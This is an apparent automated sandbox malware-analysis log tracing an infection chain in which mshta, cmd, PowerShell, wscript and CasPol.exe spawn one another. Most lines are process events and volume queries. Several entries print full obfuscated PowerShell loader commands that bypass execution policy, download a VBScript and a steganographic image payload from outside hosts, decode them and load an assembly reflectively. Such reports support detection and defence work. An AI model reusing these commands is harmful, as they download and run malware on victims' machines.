ICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creamykissinglipsgoodforcreamythingswithcream.vbS"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5305.tmp" "c:\Users\user\AppData\Local\Temp\yy1wu0jg\CSCCF35FBE9A0D8429B84CE9BA7B3CB93B6.TMP"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $isohemolytic = 'JGNhc2VtYXRlZCA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRSYWRub3IgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRoZW1pYWJsZXBzaWEgPSAkUmFkbm9yLkRvd25sb2FkRGF0YSgkY2FzZW1hdGVkKTskYmlkZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkaGVtaWFibGVwc2lhKTska2lkZGllcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYXZlbnRhaWxlID0gJzw8QkFTRTY0X0VORD4+Jzskc3RhaW4gPSAkYmlkZXMuSW5kZXhPZigka2lkZGllcyk7JHJlc2h1ZmZsZSA9ICRiaWRlcy5JbmRleE9mKCRhdmVudGFpbGUpOyRzdGFpbiAtZ2UgMCAtYW5kICRyZXNodWZmbGUgLWd0ICRzdGFpbjskc3RhaW4gKz0gJGtpZGRpZXMuTGVuZ3RoOyRzdWJhY3V0ZWx5ID0gJHJlc2h1ZmZsZSAtICRzdGFpbjskYXJ0aHJhbGdpYSA9ICRiaWRlcy5TdWJzdHJpbmcoJHN0YWluLCAkc3ViYWN1dGVseSk7JHVuYWRzb3JiZWQgPSAtam9pbiAoJGFydGhyYWxnaWEuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGFydGhyYWxnaWEuTGVuZ3RoKV07JG1pbnRsaWtlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5hZHNvcmJlZCk7JG1pbGxpbmVyID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkbWludGxpa2UpOyRwcm9kaWdhbCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRwcm9kaWdhbC5JbnZva2UoJG51bGwsIEAoJzAvQXpmOG8vci9lZS5ldHNhcC8vOnNwdHRoJywgJyRoZXRlcm9icmFuY2hpYScsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywgJ0Nhc1BvbCcsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnMScsJyRoZXRlcm9icmFuY2hpYScpKTs=';$choleate = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($isohemolytic));Invoke-Expression $choleate	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jdzamhdny2dit1g1icagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagqurelvrzcgugicagicagicagicagicagicagicagicagicagicagicaglu1ftwjfcmrfrmlosvrpb04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvyte1vti5ebgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagig9xaxbuewzfvyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagqkdsvvvfc0ksc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagifmsdwludcagicagicagicagicagicagicagicagicagicagicagicbpdfrvehr6cyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicague1sktsnicagicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicagicjpykyiicagicagicagicagicagicagicagicagicagicagicagic1uqu1lc1bby2ugicagicagicagicagicagicagicagicagicagicagicagywjms1nzu0feicagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicagjdzamhdny2dit1g1ojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljixmc4xntaumjqvntuvy3jlyw15a2lzc2luz2xpchnnb29kzm9yy3jlyw15dghpbmdzd2l0agnyzwftawnyzwftlnrjriisiirltly6qvbqrefuqvxjcmvhbxlraxnzaw5nbglwc2dvb2rmb3jjcmvhbxl0agluz3n3axroy3jlyw0udmjtiiwwldapo1n0yvj0lvnmzwvqkdmpo0ludm9rrs1fwhbsrvntaw9uicagicagicagicagicagicagicagicagicagicagicagicikzu5wokfquerbvefcy3jlyw15a2lzc2luz2xpchnnb29kzm9yy3jlyw15dghpbmdzd2l0agnyzwftlnziuyi='+[char]34+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jdzamhdny2dit1g1icagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagqurelvrzcgugicagicagicagicagicagicagicagicagicagicagicaglu1ftwjfcmrfrmlosvrpb04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvyte1vti5ebgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagig9xaxbuewzfvyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagqkdsvvvfc0ksc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagifmsdwludcagicagicagicagicagicagicagicagicagicagicagicbpdfrvehr6cyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicague1sktsnicagicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicagicjpykyiicagicagicagicagicagicagicagicagicagicagicagic1uqu1lc1bby2ugicagicagicagicagicagicagicagicagicagicagicagywjms1nzu0feicagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicagjdzamhdny2dit1g1ojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljixmc4xntaumjqvntuvy3jlyw15a2lzc2luz2xpchnnb29kzm9yy3jlyw15dghpbmdzd2l0agnyzwftawnyzwftlnrjriisiirltly6qvbqrefuqvxjcmvhbxlraxnzaw5nbglwc2dvb2rmb3jjcmvhbxl0agluz3n3axroy3jlyw0udmjtiiwwldapo1n0yvj0lvnmzwvqkdmpo0ludm9rrs1fwhbsrvntaw9uicagicagicagicagicagicagicagicagicagicagicagicikzu5wokfquerbvefcy3jlyw15a2lzc2luz2xpchnnb29kzm9yy3jlyw15dghpbmdzd2l0agnyzwftlnziuyi='+[char]34+'))')))"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $isohemolytic = 'jgnhc2vtyxrlzca9icdodhrwczovl3jlcy5jbg91zgluyxj5lmnvbs9kexrmbhq2mw4vaw1hz2uvdxbsb2fkl3yxnzmzmtm0otq3l2jrbhb5c2v5zxv0ngltchc1mg4xlmpwzyanoyrsywrub3igpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50oyrozw1pywjszxbzawegpsakumfkbm9ylkrvd25sb2fkrgf0ysgky2fzzw1hdgvkktskymlkzxmgpsbbu3lzdgvtllrlehqurw5jb2rpbmddojpvvey4lkdldfn0cmluzygkagvtawfibgvwc2lhktska2lkzgllcya9icc8pejbu0u2nf9tvefsvd4+jzskyxzlbnrhawxlid0gjzw8qkftrty0x0vord4+jzskc3rhaw4gpsakymlkzxmusw5kzxhpzigka2lkzgllcyk7jhjlc2h1zmzszsa9icriawrlcy5jbmrlee9mkcrhdmvudgfpbgupoyrzdgfpbiatz2ugmcatyw5kicryzxnodwzmbguglwd0icrzdgfpbjskc3rhaw4gkz0gjgtpzgrpzxmutgvuz3rooyrzdwjhy3v0zwx5id0gjhjlc2h1zmzszsaticrzdgfpbjskyxj0ahjhbgdpysa9icriawrlcy5tdwjzdhjpbmcojhn0ywlulcakc3viywn1dgvsesk7jhvuywrzb3jizwqgpsatam9pbiaojgfydghyywxnaweuvg9dagfyqxjyyxkoksb8iezvckvhy2gtt2jqzwn0ihsgjf8gfslblteuli0ojgfydghyywxnaweutgvuz3rokv07jg1pbnrsawtlid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygkdw5hzhnvcmjlzck7jg1pbgxpbmvyid0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzcgkbwludgxpa2upoyrwcm9kawdhbca9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyrwcm9kawdhbc5jbnzva2uojg51bgwsieaojzavqxpmog8vci9lzs5ldhnhcc8vonnwdhrojywgjyrozxrlcm9icmfuy2hpyscsicckagv0zxjvynjhbmnoawenlcanjghldgvyb2jyyw5jaglhjywgj0nhc1bvbccsicckagv0zxjvynjhbmnoawenlcanjghldgvyb2jyyw5jaglhjywnjghldgvyb2jyyw5jaglhjywnjghldgvyb2jyyw5jaglhjywnjghldgvyb2jyyw5jaglhjywnjghldgvyb2jyyw5jaglhjywnjghldgvyb2jyyw5jaglhjywnmscsjyrozxrlcm9icmfuy2hpyscpkts=';$choleate = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($isohemolytic));invoke-expression $choleate
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jdzamhdny2dit1g1icagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagqurelvrzcgugicagicagicagicagicagicagicagicagicagicagicaglu1ftwjfcmrfrmlosvrpb04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvyte1vti5ebgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagig9xaxbuewzfvyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagqkdsvvvfc0ksc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagifmsdwludcagicagicagicagicagicagicagicagicagicagicagicbpdfrvehr6cyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicague1sktsnicagicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicagicjpykyiicagicagicagicagicagicagicagicagicagicagicagic1uqu1lc1bby2ugicagicagicagicagicagicagicagicagicagicagicagywjms1nzu0feicagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicagjdzamhdny2dit1g1ojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljixmc4xntaumjqvntuvy3jlyw15a2lzc2luz2xpchnnb29kzm9yy3jlyw15dghpbmdzd2l0agnyzwftawnyzwftlnrjriisiirltly6qvbqrefuqvxjcmvhbxlraxnzaw5nbglwc2dvb2rmb3jjcmvhbxl0agluz3n3axroy3jlyw0udmjtiiwwldapo1n0yvj0lvnmzwvqkdmpo0ludm9rrs1fwhbsrvntaw9uicagicagicagicagicagicagicagicagicagicagicagicikzu5wokfquerbvefcy3jlyw15a2lzc2luz2xpchnnb29kzm9yy3jlyw15dghpbmdzd2l0agnyzwftlnziuyi='+[char]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jdzamhdny2dit1g1icagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagqurelvrzcgugicagicagicagicagicagicagicagicagicagicagicaglu1ftwjfcmrfrmlosvrpb04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvyte1vti5ebgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagig9xaxbuewzfvyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagqkdsvvvfc0ksc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagifmsdwludcagicagicagicagicagicagicagicagicagicagicagicbpdfrvehr6cyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicague1sktsnicagicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicagicjpykyiicagicagicagicagicagicagicagicagicagicagicagic1uqu1lc1bby2ugicagicagicagicagicagicagicagicagicagicagicagywjms1nzu0feicagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicagjdzamhdny2dit1g1ojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljixmc4xntaumjqvntuvy3jlyw15a2lzc2luz2xpchnnb29kzm9yy3jlyw15dghpbmdzd2l0agnyzwftawnyzwftlnrjriisiirltly6qvbqrefuqvxjcmvhbxlraxnzaw5nbglwc2dvb2rmb3jjcmvhbxl0agluz3n3axroy3jlyw0udmjtiiwwldapo1n0yvj0lvnmzwvqkdmpo0ludm9rrs1fwhbsrvntaw9uicagicagicagicagicagicagicagicagicagicagicagicikzu5wokfquerbvefcy3jlyw15a2lzc2luz2xpchnnb29kzm9yy3jlyw15dghpbmdzd2l0agnyzwftlnziuyi='+[char]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $isohemolytic = 'jgnhc2vtyxrlzca9icdodhrwczovl3jlcy5jbg91zgluyxj5lmnvbs9kexrmbhq2mw4vaw1hz2uvdxbsb2fkl3yxnzmzmtm0otq3l2jrbhb5c2v5zxv0ngltchc1mg4xlmpwzyanoyrsywrub3igpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50oyrozw1pywjszxbzawegpsakumfkbm9ylkrvd25sb2fkrgf0ysgky2fzzw1hdgvkktskymlkzxmgpsbbu3lzdgvtllrlehqurw5jb2rpbmddojpvvey4lkdldfn0cmluzygkagvtawfibgvwc2lhktska2lkzgllcya9icc8pejbu0u2nf9tvefsvd4+jzskyxzlbnrhawxlid0gjzw8qkftrty0x0vord4+jzskc3rhaw4gpsakymlkzxmusw5kzxhpzigka2lkzgllcyk7jhjlc2h1zmzszsa9icriawrlcy5jbmrlee9mkcrhdmvudgfpbgupoyrzdgfpbiatz2ugmcatyw5kicryzxnodwzmbguglwd0icrzdgfpbjskc3rhaw4gkz0gjgtpzgrpzxmutgvuz3rooyrzdwjhy3v0zwx5id0gjhjlc2h1zmzszsaticrzdgfpbjskyxj0ahjhbgdpysa9icriawrlcy5tdwjzdhjpbmcojhn0ywlulcakc3viywn1dgvsesk7jhvuywrzb3jizwqgpsatam9pbiaojgfydghyywxnaweuvg9dagfyqxjyyxkoksb8iezvckvhy2gtt2jqzwn0ihsgjf8gfslblteuli0ojgfydghyywxnaweutgvuz3rokv07jg1pbnrsawtlid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygkdw5hzhnvcmjlzck7jg1pbgxpbmvyid0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzcgkbwludgxpa2upoyrwcm9kawdhbca9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyrwcm9kawdhbc5jbnzva2uojg51bgwsieaojzavqxpmog8vci9lzs5ldhnhcc8vonnwdhrojywgjyrozxrlcm9icmfuy2hpyscsicckagv0zxjvynjhbmnoawenlcanjghldgvyb2jyyw5jaglhjywgj0nhc1bvbccsicckagv0zxjvynjhbmnoawenlcanjghldgvyb2jyyw5jaglhjywnjghldgvyb2jyyw5jaglhjywnjghldgvyb2jyyw5jaglhjywnjghldgvyb2jyyw5jaglhjywnjghldgvyb2jyyw5jaglhjywnjghldgvyb2jyyw5jaglhjywnmscsjyrozxrlcm9icmfuy2hpyscpkts=';$choleate = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($isohemolytic));invoke-expression $choleate	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 12_2_00433E1A cpuid

12_2_00433E1A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: GetLocaleInfoW,	12_2_004510CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: EnumSystemLocalesW,	12_2_004470BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	12_2_004511F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: GetLocaleInfoW,	12_2_004512FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	12_2_004513C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: GetLocaleInfoW,	12_2_004475A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: GetLocaleInfoA,	12_2_0040E679
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	12_2_00450A8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: EnumSystemLocalesW,	12_2_00450D52
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: EnumSystemLocalesW,	12_2_00450D07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: EnumSystemLocalesW,	12_2_00450DED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	12_2_00450E7A

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
